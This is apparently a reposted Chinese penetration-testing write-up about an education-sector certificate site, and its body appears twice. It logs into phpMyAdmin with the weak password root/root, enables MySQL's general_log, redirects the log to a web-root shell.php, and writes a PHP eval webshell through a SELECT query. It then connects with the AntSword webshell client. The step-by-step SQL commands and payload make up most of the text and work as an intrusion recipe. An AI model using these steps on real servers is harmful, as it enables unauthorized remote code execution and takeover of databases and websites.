edusrc某证书站挖掘分享(越权)

admin 2024年9月28日13:46:17评论14 views字数 1717阅读5分43秒阅读模式

edusrc某证书站挖掘分享(越权)

扫描获取phpmyadmin并通过弱口令进入后台!

弱密码root root

查看mysql的日志状态

查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销

show global variables like '%secure%';

edusrc某证书站挖掘分享(越权)

general_log为是否支持写入

general_log_file为日志保存的位置

打开日志读写setglobal general_log =on;

edusrc某证书站挖掘分享(越权)

修改邮箱日志路径

edusrc某证书站挖掘分享(越权)

修改一下路径set global general_log_file='C:myphp_wwwPHPTutorialMySQLdatashell.php';

edusrc某证书站挖掘分享(越权)

写入马

将马写入日志中!!!

通过select查询操作写入日志

edusrc某证书站挖掘分享(越权)

查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>

edusrc某证书站挖掘分享(越权)

成功写入

edusrc某证书站挖掘分享(越权)

再通过phpinfo查找一下绝对路径

edusrc某证书站挖掘分享(越权)

最后成功连接

edusrc某证书站挖掘分享(越权)

edusrc某证书站挖掘分享(越权)

edusrc某证书站挖掘分享(越权)

总结步骤:

1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态

2、set global general_log = on; 开启general_log模式

3、set global general_log_file='日志路径shell.php'; 修改日志目录为shell地址

(set global general_log_file='C:myphp_wwwPHPTutorialWWWpublicshell.php';)

4、select ' <?php eval($_POST[cc]);? '

写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

5.日志路径通过扫描端口phpinfo.php获得

6.连接蚁剑!

扫描获取phpmyadmin并通过弱口令进入后台!

弱密码root root

查看mysql的日志状态

查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销

show global variables like '%secure%';

edusrc某证书站挖掘分享(越权)

general_log为是否支持写入

general_log_file为日志保存的位置

打开日志读写setglobal general_log =on;

edusrc某证书站挖掘分享(越权)

修改邮箱日志路径

edusrc某证书站挖掘分享(越权)

修改一下路径set global general_log_file='C:myphp_wwwPHPTutorialMySQLdatashell.php';

edusrc某证书站挖掘分享(越权)

写入马

将马写入日志中!!!

通过select查询操作写入日志

edusrc某证书站挖掘分享(越权)

查看一下是否写入:select '<?php @eval($_POST[xxx]); ?';>

edusrc某证书站挖掘分享(越权)

成功写入

edusrc某证书站挖掘分享(越权)

再通过phpinfo查找一下绝对路径

edusrc某证书站挖掘分享(越权)

最后成功连接

edusrc某证书站挖掘分享(越权)

edusrc某证书站挖掘分享(越权)

edusrc某证书站挖掘分享(越权)

总结步骤:

1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态

2、set global general_log = on; 开启general_log模式

3、set global general_log_file='日志路径shell.php'; 修改日志目录为shell地址

(set global general_log_file='C:myphp_wwwPHPTutorialWWWpublicshell.php';)

4、select ' <?php eval($_POST[cc]);? '

写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

5.日志路径通过扫描端口phpinfo.php获得

6.连接蚁剑!

本公众号云息信安所提供的信息以及工具仅供安全测试人员用于授权测试,禁止用于未授权测试,请勿非法使用!!!造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号云息信安及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

———————————————————————————
版权声明:版权声明:本文为freebuf博主「Z00Kiss123」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:
https://www..freebuf.com/vuls/358125.html

原文始发于微信公众号(云息信安):edusrc某证书站挖掘分享(越权)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日13:46:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   edusrc某证书站挖掘分享(越权)https://cn-sec.com/archives/1982566.html

发表评论

匿名网友 填写信息